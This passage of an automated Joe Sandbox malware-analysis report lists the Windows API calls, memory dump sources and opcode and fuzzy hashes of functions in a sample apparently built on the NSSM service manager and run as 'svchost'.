                                                    • Instruction Fuzzy Hash: D5014FB1604212ABD704CE7CDD44EAFBBEDEBC8640F48492DB854D3284DB34E8058BA6
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000002,?,?,?,?,00000000), ref: 0040888F
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004088A2
                                                    • SetEndOfFile.KERNEL32(00000000), ref: 004088AE
                                                    • GetLastError.KERNEL32(00000000), ref: 004088BB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLastPointer
                                                    • String ID:
                                                    • API String ID: 2723331319-0
                                                    • Opcode ID: 4e0b794f19faba63de2e6a99d64c6716e3658fd301ade40050abe0956df1ca94
                                                    • Instruction ID: 5390559d92aa947b9314eb53a18356e94adec141a5a2c230ab48a642764cfde5
                                                    • Opcode Fuzzy Hash: 4e0b794f19faba63de2e6a99d64c6716e3658fd301ade40050abe0956df1ca94
                                                    • Instruction Fuzzy Hash: DBF0C8B66046107FE2109758AC0AF9F7768DFC4B24F50C539FA05E62D1D774DC4186BA
                                                    APIs
                                                    • GetDlgItem.USER32(00000000), ref: 0040587D
                                                    • SendMessageW.USER32(00000000,?,0000000E,00000000), ref: 00405884
                                                    • GetDlgItemTextW.USER32(00000000), ref: 00405898
                                                      • Part of subcall function 004054A0: MessageBoxW.USER32(00000000,The message which was supposed to go here is missing!,NSSM,00000030), ref: 004054E4
                                                    • _memset.LIBCMT ref: 004058BF
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ItemMessage$SendText_memset
                                                    • String ID:
                                                    • API String ID: 106090685-0
                                                    • Opcode ID: 6c1f17a3ed959549f23045dc7471758394cc86d8812c56315956d8aff6da2db9
                                                    • Instruction ID: cb56df8b7445a31a75e8c4718e41db6c747a4df5fb1419ea8052b39527e82588
                                                    • Opcode Fuzzy Hash: 6c1f17a3ed959549f23045dc7471758394cc86d8812c56315956d8aff6da2db9
                                                    • Instruction Fuzzy Hash: A2F0A7B17003007BE120AB61DC8DF573B6CDF44B45F40441D7904D61D1D67CE900CE29
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
                                                    • HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$HeapSource$AllocDeregisterProcessRegisterReport
                                                    • String ID: alloc_nssm_service()$service
                                                    • API String ID: 1868725766-2157636798
                                                    • Opcode ID: 8ea0d5565f999da2896c2c36d03efb47440df890c0c9d5ffe8b582c93dbb814f
                                                    • Instruction ID: 2c9525e28b5191ed34799dbcc002321da452954f880f3acf974e46df2d9dfe00
                                                    • Opcode Fuzzy Hash: 8ea0d5565f999da2896c2c36d03efb47440df890c0c9d5ffe8b582c93dbb814f
                                                    • Instruction Fuzzy Hash: FAD05EF5E8062027D61222A87C0AFDB25089750B56F528A71BE18F62C2D5A8884046AC
                                                    APIs
                                                    • GetConsoleWindow.KERNEL32 ref: 00401A01
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00401A10
                                                    • GetCurrentProcessId.KERNEL32 ref: 00401A1A
                                                    • FreeConsole.KERNEL32 ref: 00401A25
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleProcessWindow$CurrentFreeThread
                                                    • String ID:
                                                    • API String ID: 3525601419-0
                                                    • Opcode ID: 5629e28a465c767bbbe1bbf1bc2c58c11f9f367261ce32223375feb305a5a444
                                                    • Instruction ID: 2f1dd8984dbdf2ce013bee9d2ff09af7205948615cb30f205b3daea2ec8f1f74
                                                    • Opcode Fuzzy Hash: 5629e28a465c767bbbe1bbf1bc2c58c11f9f367261ce32223375feb305a5a444
                                                    • Instruction Fuzzy Hash: 13D09EB0B211019BD7147B75DD4C59A77B8EE44312750C579E852D11A0DB78D440CE39
                                                    APIs
                                                    • GetDlgItemTextW.USER32(?,000003ED,00000002,00000100), ref: 004067EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ItemText
                                                    • String ID: remove()$service
                                                    • API String ID: 3367045223-1317115628
                                                    • Opcode ID: cc42bf898366cd54f4183dcd42ca600010007e7b9bb62e5b1c9b9d6a06996358
                                                    • Instruction ID: 8184d59d72f0fbf905fa053582e3628f82c79463e423cb7eee217312d63cbccc
                                                    • Opcode Fuzzy Hash: cc42bf898366cd54f4183dcd42ca600010007e7b9bb62e5b1c9b9d6a06996358
                                                    • Instruction Fuzzy Hash: B021DEB3A4451032E112319DBC82FEF9258CB9076DF84803BF208F91C6E73D5A91419E
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040877C
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeregisterRegisterReport__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: %s%s$set_createfile_parameter()
                                                    • API String ID: 2445375048-102671490
                                                    • Opcode ID: 28d182d9b054d50c6284244cab05a53826a641f1a040c1f726e585f693a11305
                                                    • Instruction ID: 3394c9dda24fa343ec2156a0d0e2bb01f682d842124ecdf63034fec8dba4f21e
                                                    • Opcode Fuzzy Hash: 28d182d9b054d50c6284244cab05a53826a641f1a040c1f726e585f693a11305
                                                    • Instruction Fuzzy Hash: 9701B1B26142002BD300A7598C42FAFB3E8ABC4314F80041EF515972C1F5B8A59587D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LocalSystem
                                                    • API String ID: 0-3718507506
                                                    • Opcode ID: 2781d35c690fc2a676cfbd0f3a4b98b4639caa1f8c1be83308235997636d1291
                                                    • Instruction ID: 9109e31f7caa357bacc1ff475e9021cac7f2486fa8cfe9e055bed6058de38d4d
                                                    • Opcode Fuzzy Hash: 2781d35c690fc2a676cfbd0f3a4b98b4639caa1f8c1be83308235997636d1291
                                                    • Instruction Fuzzy Hash: BFF0B477B001206BDA105A55AC00BDBA3AC9B847A7F14003FF901E31E1E77C994282E9
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2582096108.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF706B90000, based on PE: true
                                                    • Associated: 0000000F.00000002.2582068603.00007FF706B90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2582551567.00007FF707182000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2582570045.00007FF707183000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2582636739.00007FF707188000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2582670400.00007FF707192000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2582884392.00007FF70735C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2582884392.00007FF70736E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2582884392.00007FF7075FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2582884392.00007FF70767C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2583035300.00007FF70767D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2583079395.00007FF70767E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2583101725.00007FF70767F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2583101725.00007FF707684000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 0000000F.00000002.2583132468.00007FF70768A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_7ff706b90000_systems.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e034127c26fa0395a53f703df2a15af482bb6d566b48f2a53d70d7614fb986c
                                                    • Instruction ID: 6ec0f04e948924c0b49993f39a3231ebe5d91aa757f4acc3417fed1f800cf287
                                                    • Opcode Fuzzy Hash: 8e034127c26fa0395a53f703df2a15af482bb6d566b48f2a53d70d7614fb986c
                                                    • Instruction Fuzzy Hash: 76B0127190829790F3003F05EC813286230AF16741FD14030C80C03361DF3C54014730